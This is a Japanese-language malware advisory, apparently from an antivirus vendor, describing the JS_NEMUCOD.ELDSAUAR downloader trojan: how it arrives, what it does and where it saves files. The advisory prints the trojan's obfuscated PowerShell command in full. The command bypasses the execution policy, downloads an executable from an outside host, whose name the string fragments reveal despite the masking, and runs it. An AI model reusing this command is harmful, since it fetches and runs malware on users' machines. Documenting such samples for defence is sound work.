• Email
• Facebook
• Twitter
• Google+
• Linkedin

JS_NEMUCOD.ELDSAUAR

---

• マルウェアタイプ: トロイの木馬型
• 破壊活動の有無: なし
• 暗号化: なし
• 感染報告の有無: はい

---

  概要

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。 マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、ワーム活動の機能を備えていません。

マルウェアは、バックドア活動の機能を備えていません。

マルウェアは、ダウンロードしたファイルを実行します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。

---

  詳細

侵入方法

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

感染活動

マルウェアは、ワーム活動の機能を備えていません。

バックドア活動

マルウェアは、バックドア活動の機能を備えていません。

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

• http://{BLOCKED}enachter.de/Styles/outloo.exe

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

• %AppDataLocal%\Tempejejpoqw.exe

(註：%AppDataLocal%フォルダは、Windows 2000、XP および Server 2003 の場合、通常、"C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data"、Windows Vista および 7 の場合、"C:\Users\＜ユーザ名＞\AppData\Local" です。)

マルウェアは、ダウンロードしたファイルを実行します。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

マルウェアは、ダウンロード活動を実行するために以下のコマンドラインを利用してPowerShellのスクリプトを実行します。

• "%System%\cmd.exe" /c " powershell $ujitq='^nv:temp+''eje';$jqohilp='^Policy Bypass';$oflehi='^h';$nacqyb='^jpoqw.exe'');(';$ruxym='^/outloo.exe'',';$igmycte='^stem.Net.Webc';$aqila='^New-Object Sy';$aheh='^$path); Start';$ihudb='^ss; $path=($e';$qlolowq='^-Process $pat';$almyr='^Set-Execution';$qgawa='^ -Scope Proce';$ygapne='^adFile(''http:';$zbiba='^ter.de/Styles';$usyspu='^//seehasenach';$enzuz='^lient).Downlo'; Invoke-Expression ($almyr+$jqohilp+$qgawa+$ihudb+$ujitq+$nacqyb+$aqila+$igmycte+$enzuz+$ygapne+$usyspu+$zbiba+$ruxym+$aheh+$qlolowq+$oflehi);

マルウェアは、ルートキット機能を備えていません。

マルウェアは、脆弱性を利用した感染活動を行いません。

---

  対応方法

ご利用はいかがでしたか？　アンケートにご協力ください